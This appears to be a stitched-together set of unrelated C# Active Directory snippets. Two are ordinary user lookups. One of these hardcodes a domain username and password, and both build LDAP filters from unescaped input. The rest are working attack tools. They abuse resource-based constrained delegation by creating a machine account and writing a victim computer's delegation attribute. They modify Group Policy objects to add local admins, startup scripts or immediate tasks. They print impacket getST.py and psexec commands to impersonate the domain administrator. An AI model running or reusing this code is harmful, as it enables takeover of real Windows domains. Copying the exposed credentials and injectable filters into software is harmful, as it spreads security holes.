public HttpResponseMessage getActiveDirectoryUserDetail(HttpRequestMessage request, string loginid) { return(GetHttpResponse(request, () => { HttpResponseMessage response = null; loginid = loginid.Replace("FORWARDSLASHXTER", "/").Trim(); loginid = loginid.Replace("DOTXTER", ".").Trim(); string connection = ConfigurationManager.ConnectionStrings["ADConnectionString"].ToString(); System.DirectoryServices.DirectorySearcher dssearch = new System.DirectoryServices.DirectorySearcher(connection); dssearch.Filter = "(sAMAccountName=" + loginid + ")"; System.DirectoryServices.SearchResult sresult = dssearch.FindOne(); System.DirectoryServices.DirectoryEntry dsresult = sresult.GetDirectoryEntry(); string firstname = Convert.ToString(dsresult.Properties["givenName"].Value); string lastname = Convert.ToString(dsresult.Properties["sn"].Value); //sn means surname //string empid = Convert.ToString(dsresult.Properties["employeeID"].Value); string empid = Convert.ToString(dsresult.Properties["company"].Value); //string empno = Convert.ToString(dsresult.Properties["employeeNumber"].Value); string mail = Convert.ToString(dsresult.Properties["mail"].Value); var ADuserdetail = new UserSetup() { //LoginID = loginid, //Name = "Taiwo", //Email = "*****@*****.**", //StaffID = "empid" LoginID = loginid, Name = firstname + " " + lastname, Email = mail, StaffID = empid }; response = request.CreateResponse <UserSetup>(HttpStatusCode.OK, ADuserdetail); return response; })); }
public static void SetSecurityDescriptor(String Domain, String victim_distinguished_name, String victimcomputer, String sid, bool cleanup) { // get the domain object of the victim computer and update its securty descriptor System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain); myldapConnection.Path = "LDAP://" + victim_distinguished_name; myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure; System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection); search.Filter = "(cn=" + victimcomputer + ")"; string[] requiredProperties = new string[] { "samaccountname" }; foreach (String property in requiredProperties) { search.PropertiesToLoad.Add(property); } System.DirectoryServices.SearchResult result = null; try { result = search.FindOne(); } catch (System.Exception ex) { Console.WriteLine(ex.Message + "Exiting..."); return; } if (result != null) { System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry(); String sec_descriptor = ""; if (!cleanup) { sec_descriptor = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid + ")"; System.Security.AccessControl.RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor); byte[] descriptor_buffer = new byte[sd.BinaryLength]; sd.GetBinaryForm(descriptor_buffer, 0); // Add AllowedToAct Security Descriptor entryToUpdate.Properties["msds-allowedtoactonbehalfofotheridentity"].Value = descriptor_buffer; } else { // Cleanup attribute Console.WriteLine("[+] Clearing attribute..."); entryToUpdate.Properties["msds-allowedtoactonbehalfofotheridentity"].Clear(); } try { // Commit changes to the security descriptor entryToUpdate.CommitChanges(); Console.WriteLine("[+] Attribute changed successfully"); Console.WriteLine("[+] Done!"); } catch (System.Exception ex) { Console.WriteLine(ex.Message); Console.WriteLine("[!] Could not update attribute!\nExiting..."); return; } } else { Console.WriteLine("[!] Computer Account not found!\nExiting..."); } return; }
// Updage GPT.ini so that changes take effect without gpupdate /force public static void UpdateVersion(String Domain, String distinguished_name, String GPOName, String path, String function) { String line = ""; List <string> new_list = new List <string>(); if (!File.Exists(path)) { Console.WriteLine("[-] Could not find GPT.ini. The group policy might need to be updated manually using 'gpupdate /force'"); } // get the object of the GPO and update its versionNumber System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain); myldapConnection.Path = "LDAP://" + distinguished_name; myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure; System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection); search.Filter = "(displayName=" + GPOName + ")"; string[] requiredProperties = new string[] { "versionNumber", "gPCMachineExtensionNames" }; foreach (String property in requiredProperties) { search.PropertiesToLoad.Add(property); } System.DirectoryServices.SearchResult result = null; try { result = search.FindOne(); } catch (System.Exception ex) { Console.WriteLine(ex.Message + "[!] Exiting..."); System.Environment.Exit(0); } int new_ver = 0; if (result != null) { System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry(); // get AD number of GPO and increase it by 1 new_ver = Convert.ToInt32(entryToUpdate.Properties["versionNumber"].Value) + 1; entryToUpdate.Properties["versionNumber"].Value = new_ver; // update gPCMachineExtensionNames to add local admin if (function == "AddLocalAdmin" || function == "AddNewRights") { try { if (!entryToUpdate.Properties["gPCMachineExtensionNames"].Value.ToString().Contains("[{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]")) { entryToUpdate.Properties["gPCMachineExtensionNames"].Value += "[{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]"; } } catch { entryToUpdate.Properties["gPCMachineExtensionNames"].Value = "[{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]"; } } // update gPCMachineExtensionNames to add immediate task if (function == "NewImmediateTask") { try { if (!entryToUpdate.Properties["gPCMachineExtensionNames"].Value.ToString().Contains("[{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]")) { entryToUpdate.Properties["gPCMachineExtensionNames"].Value += "[{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]"; } } catch { entryToUpdate.Properties["gPCMachineExtensionNames"].Value = "[{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]"; } } // update gPCMachineExtensionNames to add startup script if (function == "NewStartupScript") { try { if (!entryToUpdate.Properties["gPCMachineExtensionNames"].Value.ToString().Contains("[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B6664F-4972-11D1-A7CA-0000F87571E3}]")) { entryToUpdate.Properties["gPCMachineExtensionNames"].Value += "[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B6664F-4972-11D1-A7CA-0000F87571E3}]"; } } catch { entryToUpdate.Properties["gPCMachineExtensionNames"].Value = "[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B6664F-4972-11D1-A7CA-0000F87571E3}]"; } } try { // Commit changes to the security descriptor entryToUpdate.CommitChanges(); Console.WriteLine("[+] versionNumber attribute changed successfully"); } catch (System.Exception ex) { Console.WriteLine(ex.Message); Console.WriteLine("[!] Could not update versionNumber attribute!\nExiting..."); System.Environment.Exit(0); } } else { Console.WriteLine("[!] GPO not found!\nExiting..."); System.Environment.Exit(0); } using (System.IO.StreamReader file = new System.IO.StreamReader(path)) { while ((line = file.ReadLine()) != null) { if (line.Replace(" ", "").Contains("Version=")) { line = line.Split('=')[1]; line = "Version=" + Convert.ToString(new_ver); } new_list.Add(line); } } using (System.IO.StreamWriter file2 = new System.IO.StreamWriter(path)) { foreach (string l in new_list) { file2.WriteLine(l); } } Console.WriteLine("[+] The version number in GPT.ini was increased successfully."); if (function == "AddLocalAdmin") { Console.WriteLine("[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.\n[+] Done!"); } else if (function == "NewStartupScript") { Console.WriteLine("[+] The GPO was modified to include a new startup script. Wait for the GPO refresh cycle.\n[+] Done!"); } else if (function == "NewImmediateTask") { Console.WriteLine("[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.\n[+] Done!"); } else if (function == "AddNewRights") { Console.WriteLine("[+] The GPO was modified to assign new rights to target user. Wait for the GPO refresh cycle.\n[+] Done!"); } }
public ActionResult <ADProperties> GetAdsProperties(string userName) { ADProperties aDProperties = new ADProperties(); try { const string LDAP_PATH = "LDAP://10.12.0.8"; //"/CN=VCH USERS,DC=MUSA,DC=net"; //const string LDAP_DOMAIN = "10.12.0.8";//"exldap.example.com:5555"; //const string FirstName = "Cinthia"; //const string LastName = "Schram"; string titleValue = ""; string departmentValue = ""; using (var ade = new System.DirectoryServices.DirectoryEntry(LDAP_PATH, "vgh\\ngediya", "Ayush080982")) using (var dss = new System.DirectoryServices.DirectorySearcher(ade)) { // string filter = @"(&(givenname=" + FirstName + ")(sn=" + LastName + "))"; string filter = @"(&(sAMAccountName=" + userName + "))"; //dss.Filter = "(sAMAccountName=ngediya)"; dss.Filter = filter; System.DirectoryServices.SearchResult sresult = dss.FindOne(); System.DirectoryServices.DirectoryEntry dsresult = sresult.GetDirectoryEntry(); //Console.WriteLine("First Name:" + dsresult.Properties["givenname"][0].ToString()); //Console.WriteLine("Last Name:" + dsresult.Properties["cn"][0].ToString()); //Console.WriteLine("Full Name:" + dsresult.Properties["name"][0].ToString()); //Console.WriteLine("Mail:" + dsresult.Properties["mail"][0].ToString()); //Console.WriteLine("LoginId" + dsresult.Properties["sAMAccountName"][0].ToString()); foreach (var item in sresult.Properties.PropertyNames) { try { if (dsresult.Properties[item.ToString()].Count > 0) { //Console.WriteLine(item.ToString() + ":" + dsresult.Properties[item.ToString()][0].ToString()); if (item.ToString() == "title") { titleValue = dsresult.Properties[item.ToString()][0].ToString(); aDProperties.Title = titleValue; } if (item.ToString() == "department") { departmentValue = dsresult.Properties[item.ToString()][0].ToString(); aDProperties.Location = departmentValue; } if (item.ToString() == "givenname") { aDProperties.FirstName = dsresult.Properties[item.ToString()][0].ToString(); } if (item.ToString() == "sn") { aDProperties.LastName = dsresult.Properties[item.ToString()][0].ToString(); } if (item.ToString() == "mail") { aDProperties.EmailAddress = dsresult.Properties[item.ToString()][0].ToString(); } } } catch (Exception ex) { //Console.WriteLine("Error ----->" + item.ToString()); return(null); } } } return(aDProperties); } catch (Exception ex) { // _log.Log(LogLevel.Information, ex.Message); return(aDProperties); } }
static void Main(string[] args) { if (args.Length < 2) { Usage(); return; } var arguments = new Dictionary <string, string>(); foreach (string argument in args) { int idx = argument.IndexOf('='); if (idx > 0) { arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); } } if (!arguments.ContainsKey("domain") || !arguments.ContainsKey("dc") || !arguments.ContainsKey("tm")) { Usage(); return; } String DomainController = arguments["dc"]; String Domain = arguments["domain"]; String new_MachineAccount = ""; String new_MachineAccount_password = ""; //添加的机器账户 if (arguments.ContainsKey("ma")) { new_MachineAccount = arguments["ma"]; } else { new_MachineAccount = RandomString(8); } //机器账户密码 if (arguments.ContainsKey("ma")) { new_MachineAccount_password = arguments["mp"]; } else { new_MachineAccount_password = RandomString(10); } String victimcomputer = arguments["tm"];; //需要进行提权的机器 String machine_account = new_MachineAccount; String sam_account = ""; String DistinguishedName = ""; if (machine_account.EndsWith("$")) { sam_account = machine_account; machine_account = machine_account.Substring(0, machine_account.Length - 1); } else { sam_account = machine_account + "$"; } String distinguished_name = DistinguishedName; String victim_distinguished_name = DistinguishedName; String[] DC_array = null; distinguished_name = "CN=" + machine_account + ",CN=Computers"; victim_distinguished_name = "CN=" + victimcomputer + ",CN=Computers"; DC_array = Domain.Split('.'); foreach (String DC in DC_array) { distinguished_name += ",DC=" + DC; victim_distinguished_name += ",DC=" + DC; } Console.WriteLine("[+] Elevate permissions on " + victimcomputer); Console.WriteLine("[+] Domain = " + Domain); Console.WriteLine("[+] Domain Controller = " + DomainController); Console.WriteLine("[+] New SAMAccountName = " + sam_account); //Console.WriteLine("[+] Distinguished Name = " + distinguished_name); //连接ldap System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389); //NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录 System.DirectoryServices.Protocols.LdapConnection connection = null; //connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc); connection = new System.DirectoryServices.Protocols.LdapConnection(identifier); connection.SessionOptions.Sealing = true; connection.SessionOptions.Signing = true; connection.Bind(); var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] { new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain), new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account), new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"), new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")), new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"), new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account) }); //通过ldap找计算机 System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain); myldapConnection.Path = "LDAP://" + victim_distinguished_name; myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure; System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection); search.Filter = "(CN=" + victimcomputer + ")"; string[] requiredProperties = new string[] { "samaccountname" }; foreach (String property in requiredProperties) { search.PropertiesToLoad.Add(property); } System.DirectoryServices.SearchResult result = null; try { result = search.FindOne(); } catch (System.Exception ex) { Console.WriteLine(ex.Message + "[-] Exiting..."); return; } try { //添加机器账户 connection.SendRequest(request); Console.WriteLine("[+] Machine account: " + machine_account + " Password: "******" added"); } catch (System.Exception ex) { Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)"); Console.WriteLine("[-] Exception: " + ex.Message); return; } // 获取新计算机对象的SID var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null); var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request); SecurityIdentifier sid = null; foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries) { try { sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0); Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value); } catch { Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting..."); return; } } //设置资源约束委派 if (result != null) { System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry(); String sec_descriptor = @"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")"; RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor); byte[] buffer = new byte[sd.BinaryLength]; sd.GetBinaryForm(buffer, 0); //测试sddl转换结果 //RawSecurityDescriptor test_back = new RawSecurityDescriptor (buffer, 0); //Console.WriteLine(test_back.GetSddlForm(AccessControlSections.All)); // 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中 try { //entryToUpdate.Properties["msDS-AllowedToActOnBehalfOfOtherIdentity"].Value = buffer; entryToUpdate.InvokeSet("msDS-AllowedToActOnBehalfOfOtherIdentity", buffer); entryToUpdate.CommitChanges();//提交更改 entryToUpdate.Close(); Console.WriteLine("[+] Exploit successfully!"); //打印利用方式 Console.WriteLine("[+] Use impacket to get priv!\n\n[+] Command:\n"); Console.WriteLine("\ngetST.py -dc-ip {0} {1}/{2}$:{3} -spn cifs/{4}.{5} -impersonate administrator", DomainController, Domain, machine_account, new_MachineAccount_password, victimcomputer, Domain); Console.WriteLine("\nexport KRB5CCNAME=administrator.ccache"); Console.WriteLine("\npsexec.py {0}/administrator@{1}.{2} -k -no-pass", Domain, victimcomputer, Domain); } catch (System.Exception ex) { Console.WriteLine("[!] Error: " + ex.Message + " " + ex.InnerException); Console.WriteLine("[!] Failed..."); return; } } }